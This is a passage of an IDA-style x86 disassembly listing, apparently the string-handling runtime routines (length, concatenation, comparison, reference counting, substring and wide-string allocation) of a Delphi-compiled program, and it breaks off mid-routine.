sub_40004A7C proc near ; CODE XREF: sub_400062F0+49�p
; sub_40009414+121�p ...
xor ecx, ecx
test edx, edx
jz short loc_40004AA3
push edx
loc_40004A83: ; CODE XREF: sub_40004A7C+1D�j
cmp cl, [edx]
jz short loc_40004A9E
cmp cl, [edx+1]
jz short loc_40004A9D
cmp cl, [edx+2]
jz short loc_40004A9C
cmp cl, [edx+3]
jz short loc_40004A9B
add edx, 4
jmp short loc_40004A83
; ---------------------------------------------------------------------------
loc_40004A9B: ; CODE XREF: sub_40004A7C+18�j
inc edx
loc_40004A9C: ; CODE XREF: sub_40004A7C+13�j
inc edx
loc_40004A9D: ; CODE XREF: sub_40004A7C+E�j
inc edx
loc_40004A9E: ; CODE XREF: sub_40004A7C+9�j
mov ecx, edx
pop edx
sub ecx, edx
loc_40004AA3: ; CODE XREF: sub_40004A7C+4�j
jmp sub_40004974
sub_40004A7C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004AAC proc near ; CODE XREF: sub_400116DC+3DA�p
; DATA XREF: sub_4000843E:loc_40008570�o
xor ecx, ecx
test edx, edx
jz short loc_40004ADF
push edx
loc_40004AB3: ; CODE XREF: sub_40004AAC+21�j
cmp cx, [edx]
jz short loc_40004AD8
cmp cx, [edx+2]
jz short loc_40004AD5
cmp cx, [edx+4]
jz short loc_40004AD2
cmp cx, [edx+6]
jz short loc_40004ACF
add edx, 8
jmp short loc_40004AB3
; ---------------------------------------------------------------------------
loc_40004ACF: ; CODE XREF: sub_40004AAC+1C�j
add edx, 2
loc_40004AD2: ; CODE XREF: sub_40004AAC+16�j
add edx, 2
loc_40004AD5: ; CODE XREF: sub_40004AAC+10�j
add edx, 2
loc_40004AD8: ; CODE XREF: sub_40004AAC+A�j
mov ecx, edx
pop edx
sub ecx, edx
shr ecx, 1
loc_40004ADF: ; CODE XREF: sub_40004AAC+4�j
jmp sub_400049E0
sub_40004AAC endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004AE8 proc near ; CODE XREF: sub_4001293C+B8�p
; sub_40013B54+3C�p ...
xor ecx, ecx
mov cl, [edx]
inc edx
jmp sub_40004974
sub_40004AE8 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004AF4 proc near ; CODE XREF: sub_40009414+98�p
; sub_40009590+A2�p ...
push edi
push eax
push ecx
mov edi, edx
xor eax, eax
repne scasb
jnz short loc_40004B01
not ecx
loc_40004B01: ; CODE XREF: sub_40004AF4+9�j
pop eax
add ecx, eax
pop eax
pop edi
jmp sub_40004974
sub_40004AF4 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40004B0C proc near ; CODE XREF: sub_4000CE4C+2A�p
; sub_4000CEB8+2A�p ...
xor ecx, ecx
test edx, edx
jz short loc_40004B17
mov ecx, [edx-4]
shr ecx, 1
loc_40004B17: ; CODE XREF: sub_40004B0C+4�j
jmp sub_400049E0
sub_40004B0C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40004B20 proc near ; CODE XREF: .text:40015A32�p
push ebx
test edx, edx
jz short loc_40004B3D
mov ebx, [edx-4]
test ebx, ebx
jz short loc_40004B3D
cmp ecx, ebx
jl short loc_40004B32
mov ecx, ebx
loc_40004B32: ; CODE XREF: sub_40004B20+E�j
mov [eax], cl
inc eax
xchg eax, edx
call sub_40002DFC
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40004B3D: ; CODE XREF: sub_40004B20+3�j
; sub_40004B20+A�j
mov byte ptr [eax], 0
pop ebx
retn
sub_40004B20 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004B44 proc near ; CODE XREF: sub_40003328+3E�p
; sub_40003328+56�p ...
test eax, eax
jz short locret_40004B4D
sub eax, 4
mov eax, [eax]
locret_40004B4D: ; CODE XREF: sub_40004B44+2�j
retn
sub_40004B44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40004B50 proc near ; CODE XREF: sub_40004B94+1D�j
; sub_40004B94+6E�j ...
test edx, edx
jz short locret_40004B93
mov ecx, [eax]
test ecx, ecx
jz sub_400048D8
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, [ecx-4]
mov edx, [esi-4]
add edx, edi
cmp esi, ecx
jz short loc_40004B88
call sub_40004F74
mov eax, esi
mov ecx, [esi-4]
loc_40004B7B: ; CODE XREF: sub_40004B50+41�j
mov edx, [ebx]
add edx, edi
call sub_40002DFC
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40004B88: ; CODE XREF: sub_40004B50+1F�j
call sub_40004F74
mov eax, [ebx]
mov ecx, edi
jmp short loc_40004B7B
; ---------------------------------------------------------------------------
locret_40004B93: ; CODE XREF: sub_40004B50+2�j
retn
sub_40004B50 endp
; =============== S U B R O U T I N E =======================================
sub_40004B94 proc near ; CODE XREF: sub_4001293C+E2�p
; sub_4001293C+F5�p ...
test edx, edx
jz short loc_40004BF9
test ecx, ecx
jz sub_400048D8
cmp edx, [eax]
jz short loc_40004C00
cmp ecx, [eax]
jz short loc_40004BB6
push eax
push ecx
call sub_400048D8
pop edx
pop eax
jmp sub_40004B50
; ---------------------------------------------------------------------------
loc_40004BB6: ; CODE XREF: sub_40004B94+12�j
push ebx
push esi
push edi
mov ebx, edx
mov esi, ecx
push eax
mov eax, [ebx-4]
add eax, [esi-4]
call sub_40004948
mov edi, eax
mov edx, eax
mov eax, ebx
mov ecx, [ebx-4]
call sub_40002DFC
mov edx, edi
mov eax, esi
mov ecx, [esi-4]
add edx, [ebx-4]
call sub_40002DFC
pop eax
mov edx, edi
test edi, edi
jz short loc_40004BF0
dec dword ptr [edi-8]
loc_40004BF0: ; CODE XREF: sub_40004B94+57�j
call sub_400048D8
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40004BF9: ; CODE XREF: sub_40004B94+2�j
mov edx, ecx
jmp sub_400048D8
; ---------------------------------------------------------------------------
loc_40004C00: ; CODE XREF: sub_40004B94+E�j
mov edx, ecx
jmp sub_40004B50
sub_40004B94 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40004C08 proc near ; CODE XREF: sub_4000BE64+27B�p
; sub_4000BE64+298�p ...
var_14 = dword ptr -14h
push ebx
push esi
push edi
push edx
push eax
mov ebx, edx
xor edi, edi
mov ecx, [esp+edx*4+14h]
test ecx, ecx
jz short loc_40004C25
cmp [eax], ecx
jnz short loc_40004C25
mov edi, ecx
mov eax, [ecx-4]
dec edx
jmp short loc_40004C27
; ---------------------------------------------------------------------------
loc_40004C25: ; CODE XREF: sub_40004C08+F�j
; sub_40004C08+13�j
xor eax, eax
loc_40004C27: ; CODE XREF: sub_40004C08+1B�j
; sub_40004C08+31�j
mov ecx, [esp+edx*4+14h]
test ecx, ecx
jz short loc_40004C38
add eax, [ecx-4]
cmp edi, ecx
jnz short loc_40004C38
xor edi, edi
loc_40004C38: ; CODE XREF: sub_40004C08+25�j
; sub_40004C08+2C�j
dec edx
jnz short loc_40004C27
test edi, edi
jz short loc_40004C56
mov edx, eax
mov eax, [esp+14h+var_14]
mov esi, [edi-4]
call sub_40004F74
mov edi, [esp+14h+var_14]
push dword ptr [edi]
add esi, [edi]
dec ebx
jmp short loc_40004C5E
; ---------------------------------------------------------------------------
loc_40004C56: ; CODE XREF: sub_40004C08+35�j
call sub_40004948
push eax
mov esi, eax
loc_40004C5E: ; CODE XREF: sub_40004C08+4C�j
; sub_40004C08+6B�j
mov eax, [esp+ebx*4+18h]
mov edx, esi
test eax, eax
jz short loc_40004C72
mov ecx, [eax-4]
add esi, ecx
call sub_40002DFC
loc_40004C72: ; CODE XREF: sub_40004C08+5E�j
dec ebx
jnz short loc_40004C5E
pop edx
pop eax
test edi, edi
jnz short loc_40004C87
test edx, edx
jz short loc_40004C82
dec dword ptr [edx-8]
loc_40004C82: ; CODE XREF: sub_40004C08+75�j
call sub_400048D8
loc_40004C87: ; CODE XREF: sub_40004C08+71�j
pop edx
pop edi
pop esi
pop ebx
pop eax
lea esp, [esp+edx*4]
jmp eax
sub_40004C08 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004C94 proc near ; CODE XREF: sub_40017944+4C�p
push ebx
push esi
push edi
mov esi, eax
mov edi, edx
cmp eax, edx
jz loc_40004D32
test esi, esi
jz short loc_40004D0F
test edi, edi
jz short loc_40004D16
mov eax, [esi-4]
mov edx, [edi-4]
sub eax, edx
ja short loc_40004CB7
add edx, eax
loc_40004CB7: ; CODE XREF: sub_40004C94+1F�j
push edx
shr edx, 2
jz short loc_40004CE3
loc_40004CBD: ; CODE XREF: sub_40004C94+45�j
mov ecx, [esi]
mov ebx, [edi]
cmp ecx, ebx
jnz short loc_40004D1D
dec edx
jz short loc_40004CDD
mov ecx, [esi+4]
mov ebx, [edi+4]
cmp ecx, ebx
jnz short loc_40004D1D
add esi, 8
add edi, 8
dec edx
jnz short loc_40004CBD
jmp short loc_40004CE3
; ---------------------------------------------------------------------------
loc_40004CDD: ; CODE XREF: sub_40004C94+32�j
add esi, 4
add edi, 4
loc_40004CE3: ; CODE XREF: sub_40004C94+27�j
; sub_40004C94+47�j
pop edx
and edx, 3
jz short loc_40004D0B
mov ecx, [esi]
mov ebx, [edi]
cmp cl, bl
jnz short loc_40004D32
dec edx
jz short loc_40004D0B
cmp ch, bh
jnz short loc_40004D32
dec edx
jz short loc_40004D0B
and ebx, 0FF0000h
and ecx, 0FF0000h
cmp ecx, ebx
jnz short loc_40004D32
loc_40004D0B: ; CODE XREF: sub_40004C94+53�j
; sub_40004C94+5E�j ...
add eax, eax
jmp short loc_40004D32
; ---------------------------------------------------------------------------
loc_40004D0F: ; CODE XREF: sub_40004C94+11�j
mov edx, [edi-4]
sub eax, edx
jmp short loc_40004D32
; ---------------------------------------------------------------------------
loc_40004D16: ; CODE XREF: sub_40004C94+15�j
mov eax, [esi-4]
sub eax, edx
jmp short loc_40004D32
; ---------------------------------------------------------------------------
loc_40004D1D: ; CODE XREF: sub_40004C94+2F�j
; sub_40004C94+3C�j
pop edx
cmp cl, bl
jnz short loc_40004D32
cmp ch, bh
jnz short loc_40004D32
shr ecx, 10h
shr ebx, 10h
cmp cl, bl
jnz short loc_40004D32
cmp ch, bh
loc_40004D32: ; CODE XREF: sub_40004C94+9�j
; sub_40004C94+5B�j ...
pop edi
pop esi
pop ebx
retn
sub_40004C94 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004D38 proc near ; CODE XREF: sub_4000679C+D�p
; sub_4000684C+D�p ...
test eax, eax
jz short locret_40004D46
mov edx, [eax-8]
inc edx
jle short locret_40004D46
lock inc dword ptr [eax-8]
locret_40004D46: ; CODE XREF: sub_40004D38+2�j
; sub_40004D38+8�j
retn
sub_40004D38 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004D48 proc near ; CODE XREF: sub_40003328+46�p
; sub_40007BB4+21�p ...
test eax, eax
jz short loc_40004D4E
retn
; ---------------------------------------------------------------------------
byte_40004D4D db 0 ; DATA XREF: sub_40004D48:loc_40004D4E�o
; ---------------------------------------------------------------------------
loc_40004D4E: ; CODE XREF: sub_40004D48+2�j
mov eax, offset byte_40004D4D
retn
sub_40004D48 endp
; =============== S U B R O U T I N E =======================================
sub_40004D54 proc near ; CODE XREF: sub_40004D98�j
; sub_40004DA0�j
mov edx, [eax]
test edx, edx
jz short loc_40004D92
mov ecx, [edx-8]
dec ecx
jz short loc_40004D92
push ebx
mov ebx, eax
mov eax, [edx-4]
call sub_40004948
mov edx, eax
mov eax, [ebx]
mov [ebx], edx
push eax
mov ecx, [eax-4]
call sub_40002DFC
pop eax
mov ecx, [eax-8]
dec ecx
jl short loc_40004D8F
lock dec dword ptr [eax-8]
jnz short loc_40004D8F
lea eax, [eax-8]
call sub_40002C3C
loc_40004D8F: ; CODE XREF: sub_40004D54+2B�j
; sub_40004D54+31�j
mov edx, [ebx]
pop ebx
loc_40004D92: ; CODE XREF: sub_40004D54+4�j
; sub_40004D54+A�j
mov eax, edx
retn
sub_40004D54 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40004D98 proc near ; CODE XREF: sub_40004DE8+9�p
jmp sub_40004D54
sub_40004D98 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40004DA0 proc near ; CODE XREF: sub_40006958+7A�p
; sub_40016B44+34�p ...
jmp sub_40004D54
sub_40004DA0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004DA8 proc near ; CODE XREF: sub_40007BF8+47�p
; sub_400080B0+20�p ...
arg_0 = dword ptr 4
push ebx
test eax, eax
jz short loc_40004DDA
mov ebx, [eax-4]
test ebx, ebx
jz short loc_40004DDA
dec edx
jl short loc_40004DD2
cmp edx, ebx
jge short loc_40004DDA
loc_40004DBB: ; CODE XREF: sub_40004DA8+2C�j
sub ebx, edx
test ecx, ecx
jl short loc_40004DDA
cmp ecx, ebx
jg short loc_40004DD6
loc_40004DC5: ; CODE XREF: sub_40004DA8+30�j
add edx, eax
mov eax, [esp+4+arg_0]
call sub_40004974
jmp short loc_40004DE3
; ---------------------------------------------------------------------------
loc_40004DD2: ; CODE XREF: sub_40004DA8+D�j
xor edx, edx
jmp short loc_40004DBB
; ---------------------------------------------------------------------------
loc_40004DD6: ; CODE XREF: sub_40004DA8+1B�j
mov ecx, ebx
jmp short loc_40004DC5
; ---------------------------------------------------------------------------
loc_40004DDA: ; CODE XREF: sub_40004DA8+3�j
; sub_40004DA8+A�j ...
mov eax, [esp+4+arg_0]
call sub_40004884
loc_40004DE3: ; CODE XREF: sub_40004DA8+28�j
pop ebx
retn 4
sub_40004DA8 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40004DE8 proc near ; CODE XREF: sub_40014250+47�p
; sub_40014374+44�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
call sub_40004D98
mov edx, [ebx]
test edx, edx
jz short loc_40004E2C
mov ecx, [edx-4]
dec esi
jl short loc_40004E2C
cmp esi, ecx
jge short loc_40004E2C
test edi, edi
jle short loc_40004E2C
sub ecx, esi
cmp edi, ecx
jle short loc_40004E12
mov edi, ecx
loc_40004E12: ; CODE XREF: sub_40004DE8+26�j
sub ecx, edi
add edx, esi
lea eax, [edi+edx]
call sub_40002DFC
mov edx, [ebx]
mov eax, ebx
mov edx, [edx-4]
sub edx, edi
call sub_40004F74
loc_40004E2C: ; CODE XREF: sub_40004DE8+12�j
; sub_40004DE8+18�j ...
pop edi
pop esi
pop ebx
retn
sub_40004DE8 endp
; =============== S U B R O U T I N E =======================================
sub_40004E30 proc near ; CODE XREF: sub_4000A1CC+240�p
; sub_40016D80+3D�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
push ebx
push esi
add esp, 0FFFFFFF0h
test edx, edx
jz short loc_40004E87
test eax, eax
jz short loc_40004E87
mov esi, [edx-4]
mov ebx, [eax-4]
cmp esi, ebx
jl short loc_40004E87
test ebx, ebx
jle short loc_40004E87
dec ebx
add esi, edx
add edx, ebx
mov [esp+18h+var_10], esi
add eax, ebx
mov [esp+18h+var_14], edx
neg ebx
movzx ecx, byte ptr [eax]
mov [esp+18h+var_18], ebx
jnz loc_40004F01
sub esi, 2
mov [esp+18h+var_C], esi
loc_40004E6F: ; CODE XREF: sub_40004E30+55�j
; sub_40004E30+7B�j
cmp cl, [edx]
jz short loc_40004EB4
cmp cl, [edx+1]
jz short loc_40004EC4
add edx, 2
cmp edx, [esp+18h+var_C]
jb short loc_40004E8B
cmp edx, [esp+18h+var_10]
jb short loc_40004E6F
loc_40004E87: ; CODE XREF: sub_40004E30+7�j
; sub_40004E30+B�j ...
xor eax, eax
jmp short loc_40004EBB
; ---------------------------------------------------------------------------
loc_40004E8B: ; CODE XREF: sub_40004E30+4F�j
; sub_40004E30+75�j
cmp cl, [edx]
jz short loc_40004EB4
cmp cl, [edx+1]
jz short loc_40004EC4
cmp cl, [edx+2]
jz short loc_40004EB1
cmp cl, [edx+3]
jz short loc_40004EC1
add edx, 4
cmp edx, [esp+18h+var_C]
jb short loc_40004E8B
cmp edx, [esp+18h+var_10]
jb short loc_40004E6F
xor eax, eax
jmp short loc_40004EBB
; ---------------------------------------------------------------------------
loc_40004EB1: ; CODE XREF: sub_40004E30+67�j
add edx, 2
loc_40004EB4: ; CODE XREF: sub_40004E30+41�j
; sub_40004E30+5D�j
inc edx
mov eax, edx
sub eax, [esp+18h+var_14]
loc_40004EBB: ; CODE XREF: sub_40004E30+59�j
; sub_40004E30+7F�j
add esp, 10h
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40004EC1: ; CODE XREF: sub_40004E30+6C�j
add edx, 2
loc_40004EC4: ; CODE XREF: sub_40004E30+46�j
; sub_40004E30+62�j
add edx, 2
xor eax, eax
cmp edx, [esp+18h+var_10]
ja short loc_40004ED5
mov eax, edx
sub eax, [esp+18h+var_14]
loc_40004ED5: ; CODE XREF: sub_40004E30+9D�j
add esp, 10h
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40004EDB: ; CODE XREF: sub_40004E30+C5�j
; sub_40004E30+E8�j
cmp cl, [edx]
jz short loc_40004F54
cmp cl, [edx+1]
jz short loc_40004F27
cmp cl, [edx+2]
jz short loc_40004F51
cmp cl, [edx+3]
jz short loc_40004F24
add edx, 4
cmp edx, [esp+18h+var_C]
jb short loc_40004EDB
cmp edx, [esp+18h+var_10]
jb short loc_40004F08
xor eax, eax
jmp short loc_40004F4B
; ---------------------------------------------------------------------------
loc_40004F01: ; CODE XREF: sub_40004E30+32�j
sub esi, 2
mov [esp+18h+var_C], esi
loc_40004F08: ; CODE XREF: sub_40004E30+CB�j
; sub_40004E30+EE�j
cmp cl, [edx]
jz short loc_40004F54
loc_40004F0C: ; CODE XREF: sub_40004E30+12F�j
cmp cl, [edx+1]
jz short loc_40004F27
loc_40004F11: ; CODE XREF: sub_40004E30+103�j
add edx, 2
cmp edx, [esp+18h+var_C]
jb short loc_40004EDB
cmp edx, [esp+18h+var_10]
jb short loc_40004F08
xor eax, eax
jmp short loc_40004F4B
; ---------------------------------------------------------------------------
loc_40004F24: ; CODE XREF: sub_40004E30+BC�j
add edx, 2
loc_40004F27: ; CODE XREF: sub_40004E30+B2�j
; sub_40004E30+DF�j
mov esi, [esp+18h+var_18]
loc_40004F2A: ; CODE XREF: sub_40004E30+108�j
movzx ebx, word ptr [eax+esi]
cmp bx, [edx+esi+1]
jnz short loc_40004F11
add esi, 2
jl short loc_40004F2A
add edx, 2
xor eax, eax
cmp edx, [esp+18h+var_10]
ja short loc_40004F4B
mov eax, edx
sub eax, [esp+18h+var_14]
loc_40004F4B: ; CODE XREF: sub_40004E30+CF�j
; sub_40004E30+F2�j ...
add esp, 10h
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40004F51: ; CODE XREF: sub_40004E30+B7�j
add edx, 2
loc_40004F54: ; CODE XREF: sub_40004E30+AD�j
; sub_40004E30+DA�j
mov esi, [esp+18h+var_18]
loc_40004F57: ; CODE XREF: sub_40004E30+134�j
movzx ebx, word ptr [eax+esi]
cmp bx, [edx+esi]
jnz short loc_40004F0C
add esi, 2
jl short loc_40004F57
inc edx
mov eax, edx
sub eax, [esp+18h+var_14]
add esp, 10h
pop esi
pop ebx
retn
sub_40004E30 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004F74 proc near ; CODE XREF: sub_40002EFC+85�p
; sub_400049E0+5D�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
xor edi, edi
test edx, edx
jle short loc_40004FC9
mov eax, [ebx]
test eax, eax
jz short loc_40004FAA
cmp dword ptr [eax-8], 1
jnz short loc_40004FAA
sub eax, 8
add edx, 9
push eax
mov eax, esp
call sub_40002C54
pop eax
add eax, 8
mov [ebx], eax
mov [eax-4], esi
mov byte ptr [esi+eax], 0
jmp short loc_40004FD2
; ---------------------------------------------------------------------------
loc_40004FAA: ; CODE XREF: sub_40004F74+11�j
; sub_40004F74+17�j
mov eax, edx
call sub_40004948
mov edi, eax
mov eax, [ebx]
test eax, eax
jz short loc_40004FC9
mov edx, edi
mov ecx, [eax-4]
cmp ecx, esi
jl short loc_40004FC4
mov ecx, esi
loc_40004FC4: ; CODE XREF: sub_40004F74+4C�j
call sub_40002DFC
loc_40004FC9: ; CODE XREF: sub_40004F74+B�j
; sub_40004F74+43�j
mov eax, ebx
call sub_40004884
mov [ebx], edi
loc_40004FD2: ; CODE XREF: sub_40004F74+34�j
pop edi
pop esi
pop ebx
retn
sub_40004F74 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_40004FE0
loc_40004FD8: ; CODE XREF: sub_40004FE0+E�j
; sub_40005044+21�j ...
mov al, 1
jmp sub_40002D50
; END OF FUNCTION CHUNK FOR sub_40004FE0
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40004FE0 proc near ; CODE XREF: sub_400051C0+F�p
; FUNCTION CHUNK AT 40004FD8 SIZE 00000007 BYTES
test eax, eax
jz short locret_40004FF4
push eax
push 0
call sub_40001260
test eax, eax
jz loc_40004FD8
locret_40004FF4: ; CODE XREF: sub_40004FE0+2�j
retn
sub_40004FE0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004FF8 proc near ; CODE XREF: sub_400051C0+38�p
xchg edx, [eax]
test edx, edx
jz short locret_40005004
push edx
call sub_40001270
locret_40005004: ; CODE XREF: sub_40004FF8+4�j
retn
sub_40004FF8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005008 proc near ; CODE XREF: sub_40005044+6�j
; sub_40005044+11�j ...
mov edx, [eax]
test edx, edx
jz short locret_4000501C
mov dword ptr [eax], 0
push eax
push edx
call sub_40001270
pop eax
locret_4000501C: ; CODE XREF: sub_40005008+4�j
retn
sub_40005008 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40005020 proc near ; CODE XREF: sub_40005314+70�p
; sub_40011524+B9�p ...
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_40005026: ; CODE XREF: sub_40005020+1C�j
mov eax, [ebx]
test eax, eax
jz short loc_40005038
mov dword ptr [ebx], 0
push eax
call sub_40001270
loc_40005038: ; CODE XREF: sub_40005020+A�j
add ebx, 4
dec esi
jnz short loc_40005026
pop esi
pop ebx
retn
sub_40005020 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005044 proc near ; CODE XREF: sub_40005424+81�p
; sub_40005540+61�p ...
cmp [eax], edx
jz short locret_4000506B
test edx, edx
jz sub_40005008
mov ecx, [edx-4]
shr ecx, 1
jz sub_40005008
push ecx
push edx
push eax
call sub_40001268
test eax, eax
jz loc_40004FD8
locret_4000506B: ; CODE XREF: sub_40005044+2�j
retn
sub_40005044 endp
; =============== S U B R O U T I N E =======================================
sub_4000506C proc near ; CODE XREF: sub_40005158:loc_40005161�j
; sub_40005674+16�p
var_1014 = dword ptr -1014h
var_1010 = byte ptr -1010h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFF004h
push eax
add esp, 0FFFFFFFCh
mov esi, ecx
mov [esp+1014h+var_1014], edx
mov edi, eax
test esi, esi
jg short loc_4000508E
mov eax, edi
call sub_40005008
jmp short loc_400050EB
; ---------------------------------------------------------------------------
loc_4000508E: ; CODE XREF: sub_4000506C+17�j
lea ebp, [esi+1]
cmp ebp, 7FFh
jge short loc_400050C1
push esi
lea eax, [esp+1018h+var_1010]
mov ecx, [esp+1018h+var_1014]
mov edx, 7FFh
call sub_400049C4
mov ebx, eax
test ebx, ebx
jle short loc_400050C1
lea edx, [esp+1014h+var_1010]
mov eax, edi
mov ecx, ebx
call sub_400050F8
jmp short loc_400050EB
; ---------------------------------------------------------------------------
loc_400050C1: ; CODE XREF: sub_4000506C+2B�j
; sub_4000506C+44�j
mov ebx, ebp
mov eax, edi
mov edx, ebx
call sub_400051C0
push esi
mov eax, [edi]
mov ecx, [esp+1018h+var_1014]
mov edx, ebx
call sub_400049C4
mov ebx, eax
test ebx, ebx
jge short loc_400050E2
xor ebx, ebx
loc_400050E2: ; CODE XREF: sub_4000506C+72�j
mov eax, edi
mov edx, ebx
call sub_400051C0
loc_400050EB: ; CODE XREF: sub_4000506C+20�j
; sub_4000506C+53�j
add esp, 1004h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4000506C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400050F8 proc near ; CODE XREF: sub_4000506C+4E�p
; sub_4000511C:loc_4000514F�j ...
test ecx, ecx
jz sub_40005008
push eax
push ecx
push edx
call sub_40001260
test eax, eax
jz loc_40004FD8
pop edx
push dword ptr [edx]
mov [edx], eax
call sub_40001270
retn
sub_400050F8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000511C proc near ; CODE XREF: sub_40011524+66�p
; sub_40011C18+60�p ...
xor ecx, ecx
test edx, edx
jz short loc_4000514F
push edx
loc_40005123: ; CODE XREF: sub_4000511C+21�j
cmp cx, [edx]
jz short loc_40005148
cmp cx, [edx+2]
jz short loc_40005145
cmp cx, [edx+4]
jz short loc_40005142
cmp cx, [edx+6]
jz short loc_4000513F
add edx, 8
jmp short loc_40005123
; ---------------------------------------------------------------------------
loc_4000513F: ; CODE XREF: sub_4000511C+1C�j
add edx, 2
loc_40005142: ; CODE XREF: sub_4000511C+16�j
add edx, 2
loc_40005145: ; CODE XREF: sub_4000511C+10�j
add edx, 2
loc_40005148: ; CODE XREF: sub_4000511C+A�j
mov ecx, edx
pop edx
sub ecx, edx
shr ecx, 1
loc_4000514F: ; CODE XREF: sub_4000511C+4�j
jmp sub_400050F8
sub_4000511C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005158 proc near ; CODE XREF: sub_4000D0E8+43�p
; sub_4000D158+45�p ...
xor ecx, ecx
test edx, edx
jz short loc_40005161
mov ecx, [edx-4]
loc_40005161: ; CODE XREF: sub_40005158+4�j
jmp sub_4000506C
sub_40005158 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005168 proc near ; CODE XREF: sub_40005174+E�p
; sub_400051C0+18�p ...
test eax, eax
jz short locret_40005171
mov eax, [eax-4]
shr eax, 1
locret_40005171: ; CODE XREF: sub_40005168+2�j
retn
sub_40005168 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40005174 proc near ; CODE XREF: sub_40011524+78�p
; sub_400116DC+184�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, ecx
mov ebx, edx
mov esi, eax
mov eax, esi
call sub_40005168
cmp ebx, 1
jge short loc_40005190
xor ebx, ebx
jmp short loc_40005197
; ---------------------------------------------------------------------------
loc_40005190: ; CODE XREF: sub_40005174+16�j
dec ebx
cmp eax, ebx
jge short loc_40005197
mov ebx, eax
loc_40005197: ; CODE XREF: sub_40005174+1A�j
; sub_40005174+1F�j
test edi, edi
jge short loc_4000519F
xor eax, eax
jmp short loc_400051A7
; ---------------------------------------------------------------------------
loc_4000519F: ; CODE XREF: sub_40005174+25�j
sub eax, ebx
cmp edi, eax
jge short loc_400051A7
mov eax, edi
loc_400051A7: ; CODE XREF: sub_40005174+29�j
; sub_40005174+2F�j
mov edx, ebx
add edx, edx
add edx, esi
mov ecx, [ebp+arg_0]
xchg eax, ecx
call sub_400050F8
pop edi
pop esi
pop ebx
pop ebp
retn 4
sub_40005174 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400051C0 proc near ; CODE XREF: sub_4000506C+5B�p
; sub_4000506C+7A�p
push ebx
push esi
push edi
mov esi, edx
mov edi, eax
xor ebx, ebx
test esi, esi
jle short loc_400051F4
mov eax, esi
call sub_40004FE0
mov ebx, eax
mov eax, [edi]
call sub_40005168
test eax, eax
jle short loc_400051F4
cmp esi, eax
jge short loc_400051E7
mov eax, esi
loc_400051E7: ; CODE XREF: sub_400051C0+23�j
mov ecx, eax
add ecx, ecx
mov edx, ebx
mov eax, [edi]
call sub_40002DFC
loc_400051F4: ; CODE XREF: sub_400051C0+B�j
; sub_400051C0+1F�j
mov eax, edi
mov edx, ebx
call sub_40004FF8
pop edi
pop esi
pop ebx
retn
sub_400051C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005204 proc near ; CODE XREF: sub_40005234+86�p
; sub_40016280+1D�p
xor ecx, ecx
push ebx
mov cl, [edx+1]
push esi
push edi
mov ebx, eax
lea esi, [ecx+edx+0Ah]
mov edi, [ecx+edx+6]
loc_40005216: ; CODE XREF: sub_40005204+29�j
